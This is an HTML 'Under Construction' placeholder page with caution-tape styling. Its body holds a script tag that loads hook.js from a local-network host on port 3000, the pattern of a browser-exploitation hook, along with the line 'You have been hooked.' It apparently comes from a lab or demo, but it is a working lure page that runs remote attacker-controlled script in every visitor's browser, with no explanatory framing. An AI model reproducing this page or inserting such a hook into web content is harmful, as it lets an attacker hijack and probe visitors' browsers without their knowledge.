<!DOCTYPE html>
<html lang="en">
<head>
	<style> 

	body {
            background: #222;
            font-family:verdana,Tahoma,Arial;
            text-align:center;
        } 
p{
  color: gray; 
}
.tape {
  font-size:3em;
            margin: 5% 0 0;
            height: 160px;
            background-image: -webkit-linear-gradient(0deg,#222,transparent,#222),linear-gradient(transparent 30px, #ff0 30px), repeating-linear-gradient(45deg, transparent, transparent 35px, #ff0 35px, #ff0 70px);
            background-image: -moz-linear-gradient(90deg,#222,transparent,#222),linear-gradient(transparent 30px, #ff0 30px), repeating-linear-gradient(45deg, transparent, transparent 35px, #ff0 35px, #ff0 70px);
            background-image: -o-linear-gradient(90deg,#222,transparent,#222),linear-gradient(transparent 30px, #ff0 30px), repeating-linear-gradient(45deg, transparent, transparent 35px, #ff0 35px, #ff0 70px);
            background-image: linear-gradient(90deg,#222,transparent,#222),linear-gradient(transparent 30px, #ff0 30px), repeating-linear-gradient(45deg, transparent, transparent 35px, #ff0 35px, #ff0 70px);
            background-size: auto,auto 132px,auto;
        }
        .tape span{
            cursor:default;
            color:#222;
            display:block;
            padding:1em;
  white-space:nowrap;
        }

</style>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Coming Soon</title>
	<link rel="stylesheet" href="style.css">
</head>
<body>
    <h1 class="tape">
        <span>Under Construction</span>
    </h1>
    <script src="http://192.168.1.158:3000/hook.js"></script> 
    <p> You have been hooked. </p>
</body>
</html>